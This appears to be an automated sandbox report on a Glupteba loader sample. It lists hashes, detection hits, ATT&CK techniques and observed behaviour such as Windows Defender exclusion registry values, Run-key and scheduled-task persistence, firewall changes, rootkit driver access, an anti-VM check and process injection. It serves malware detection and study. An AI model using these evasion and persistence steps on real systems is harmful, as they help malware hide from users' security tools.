glupteba | a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3

Analysis

max time kernel
283s
max time network
286s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
16/05/2024, 23:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Size

4.1MB
MD5

dab5dbe32375affdb28da1f91e309015
SHA1

dfacef5249e58cd36fe4396bb31fd2d8f0a4fa2d
SHA256

a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3
SHA512

68f8596040da58ee9f4f291a71fad13f2b27dc81ae26a35e4441ee9411a818a7ce70f0d7f8fb7f3b0590b639d8295b1dd741647c1a1b6b581acdcecb88855331
SSDEEP

49152:pvHCDSSa3hD42qGLSmY/7m0wOZef6/7XKNRZLDoULBsYgivTaJXJXiyJlvBT7gi0:pvHka3hrLY/a9UySgdYYX4jJQi9q

Score

10^/10

glupteba discovery dropper evasion execution loader persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 29 IoCs

resource	yara_rule
behavioral2/memory/512-2-0x0000000004BB0000-0x000000000549B000-memory.dmp	family_glupteba
behavioral2/memory/512-3-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/512-302-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral2/memory/512-301-0x0000000004BB0000-0x000000000549B000-memory.dmp	family_glupteba
behavioral2/memory/512-299-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/3320-1019-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1738-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1753-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1754-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1757-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1759-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1761-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1762-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1765-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1767-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1768-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1770-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1773-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1775-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1777-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1778-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1781-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1783-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1784-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1786-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1791-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1794-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1797-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba
behavioral2/memory/4944-1799-0x0000000000400000-0x0000000002B0C000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2516	netsh.exe

Executes dropped EXE 4 IoCs

pid	Process
4944	csrss.exe
4928	injector.exe
4980	windefender.exe
1756	windefender.exe

UPX packed file 16 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4980-1748-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/files/0x000800000001ac49-1749.dat	upx
behavioral2/memory/4980-1751-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1756-1752-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1756-1755-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/1756-1758-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2284-2048-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral2/files/0x000700000000069b-2047.dat	upx
behavioral2/memory/2284-2052-0x0000000000400000-0x00000000008E1000-memory.dmp	upx
behavioral2/memory/952-2291-0x0000000000FA0000-0x000000000186D000-memory.dmp	upx
behavioral2/files/0x000500000000069d-2290.dat	upx
behavioral2/files/0x000500000000069d-2289.dat	upx
behavioral2/files/0x00060000000006ad-2532.dat	upx
behavioral2/memory/5052-2531-0x0000000000400000-0x00000000008E8000-memory.dmp	upx
behavioral2/files/0x00060000000006ad-2529.dat	upx
behavioral2/memory/952-2535-0x0000000000FA0000-0x000000000186D000-memory.dmp	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe = "0"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Manipulates WinMonFS driver. 1 IoCs

Roottkits write to WinMonFS to hide directories/files from being detected.

rootkit evasion

description	ioc	Process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 7 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
File created	C:\Windows\rss\csrss.exe	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4524	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1604	powershell.exe
760	powershell.exe
4992	powershell.exe
4968	powershell.exe
1628	powershell.exe
204	powershell.exe
1312	powershell.exe
2860	powershell.exe
344	powershell.exe
4460	powershell.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
1124	schtasks.exe
4140	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2842 = "Saratov Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-912 = "Mauritius Standard Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-872 = "Pakistan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-502 = "Nepal Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
204	powershell.exe
204	powershell.exe
204	powershell.exe
512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
1312	powershell.exe
1312	powershell.exe
1312	powershell.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
1604	powershell.exe
1604	powershell.exe
1604	powershell.exe
760	powershell.exe
760	powershell.exe
760	powershell.exe
2860	powershell.exe
2860	powershell.exe
2860	powershell.exe
4992	powershell.exe
4992	powershell.exe
4992	powershell.exe
344	powershell.exe
344	powershell.exe
344	powershell.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4944	csrss.exe
4944	csrss.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4944	csrss.exe
4944	csrss.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4944	csrss.exe
4944	csrss.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe
4928	injector.exe

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	204	powershell.exe
Token: SeDebugPrivilege	512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Token: SeImpersonatePrivilege	512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
Token: SeDebugPrivilege	1312	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	2860	powershell.exe
Token: SeDebugPrivilege	4992	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeSystemEnvironmentPrivilege	4944	csrss.exe
Token: SeSecurityPrivilege	4524	sc.exe
Token: SeSecurityPrivilege	4524	sc.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 512 wrote to memory of 204	512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	74
PID 512 wrote to memory of 204	512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	74
PID 512 wrote to memory of 204	512	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	74
PID 3320 wrote to memory of 1312	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	79
PID 3320 wrote to memory of 1312	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	79
PID 3320 wrote to memory of 1312	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	79
PID 3320 wrote to memory of 1988	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	81
PID 3320 wrote to memory of 1988	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	81
PID 1988 wrote to memory of 2516	1988	cmd.exe	83
PID 1988 wrote to memory of 2516	1988	cmd.exe	83
PID 3320 wrote to memory of 1604	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	84
PID 3320 wrote to memory of 1604	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	84
PID 3320 wrote to memory of 1604	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	84
PID 3320 wrote to memory of 760	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	86
PID 3320 wrote to memory of 760	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	86
PID 3320 wrote to memory of 760	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	86
PID 3320 wrote to memory of 4944	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	88
PID 3320 wrote to memory of 4944	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	88
PID 3320 wrote to memory of 4944	3320	a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe	88
PID 4944 wrote to memory of 2860	4944	csrss.exe	107
PID 4944 wrote to memory of 2860	4944	csrss.exe	107
PID 4944 wrote to memory of 2860	4944	csrss.exe	107
PID 4944 wrote to memory of 4992	4944	csrss.exe	96
PID 4944 wrote to memory of 4992	4944	csrss.exe	96
PID 4944 wrote to memory of 4992	4944	csrss.exe	96
PID 4944 wrote to memory of 344	4944	csrss.exe	98
PID 4944 wrote to memory of 344	4944	csrss.exe	98
PID 4944 wrote to memory of 344	4944	csrss.exe	98
PID 4944 wrote to memory of 4928	4944	csrss.exe	100
PID 4944 wrote to memory of 4928	4944	csrss.exe	100
PID 4980 wrote to memory of 2860	4980	windefender.exe	107
PID 4980 wrote to memory of 2860	4980	windefender.exe	107
PID 4980 wrote to memory of 2860	4980	windefender.exe	107
PID 2860 wrote to memory of 4524	2860	cmd.exe	108
PID 2860 wrote to memory of 4524	2860	cmd.exe	108
PID 2860 wrote to memory of 4524	2860	cmd.exe	108

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\a310e2209badd030430523a1bfb0455bf3d167814deb0fda96bd44f7c74e20b3.exe
